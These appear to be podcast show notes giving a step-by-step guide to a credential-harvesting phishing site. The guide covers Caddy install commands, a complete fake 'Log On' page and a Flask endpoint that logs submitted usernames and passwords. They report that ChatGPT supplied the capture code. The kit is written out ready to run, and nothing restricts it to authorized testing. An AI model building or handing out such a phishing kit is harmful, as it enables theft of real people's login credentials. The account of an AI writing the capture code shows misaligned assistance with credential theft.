7MS #583: Cred-Capturing Phishing with Caddy Server

Today we talk about crafting cool cred-capturing phishing campaigns with Caddy server! Here's a quick set of install commands for Ubuntu:

sudo apt install -y debian-keyring debian-archive-keyring apt-transport-https

curl -1sLf 'https://dl.cloudsmith.io/public/caddy/stable/gpg.key' | sudo gpg --dearmor -o /usr/share/keyrings/caddy-stable-archive-keyring.gpg 

curl -1sLf 'https://dl.cloudsmith.io/public/caddy/stable/debian.deb.txt' | sudo tee /etc/apt/sources.list.d/caddy-stable.list 

sudo apt update 
sudo apt install caddy -y

Create an empty directory for your new site, and then create a file called Caddyfile. If all you want is a simple static site (and you've already pointed DNS for yourdomain.com to your Ubuntu droplet, just put the domain name in the Caddyfile:

domain.com

Then type sudo caddy run - and that's it! You'll serve up a blank site with lovely HTTPS goodness! If you want to get more fancy, make a index.html with a basic phishing portal:

<html><head><title>Your rad awesome eyeball cool phishing portal!</title>
<style>
body {
	background-image: url("https://tangent.town/static/background.jpg");
        background-repeat:no-repeat;
       background-size:cover;
}
</style>
</head><body><br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<center>
<table style="width:40%">
  <tbody><tr>
    <th><img src="https://tangent.town/static/company-logo.png"/></th>
		<th><form action="" method="post" name="form">
		<p style="color:black;"><label>User Name:</label>   <input name="username" type="text"/>
		</p><p style="color:black;"><label>Password:</label>    <input name="password" type="password"/>
		<br/>
		<br/>
		<input type="submit" name="submit" value="Log On"/>
		</p></form>
	</th>
</tr>
</tbody></table>

<br/>
<br/>
<center>
<p style="color:black;"><b>Unauthorized use is prohibited!</b>
</p>
</center>
</body>
</html>

This will now be served when you visit domain.com. However, Caddy doesn't (to my knowledge) have a way to handle POST requests. In other words, it doesn't have the ability to log usernames and passwords people put in your phishing portal. One of our pals from Slack asked ChatGPT about it and was offered this separate Python code to run as a POST catcher:

from flask import Flask, request

app = Flask(__name__)

@app.route('/capture', methods=['POST'])
def capture():
    print(request.form)
    return 'OK', 200

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=5000)

If you don't have Flask installed, do this:

sudo apt install python3-pip -y
sudo pip install Flask

Run this file in one session, then in your index.html file make a small tweak in the form action directive:

<snip>
<th><form action="/capture" method="post" name="form">
</snip>

Try sending creds through your phishing portal again, and you will see they are now logged in your Python POST catcher!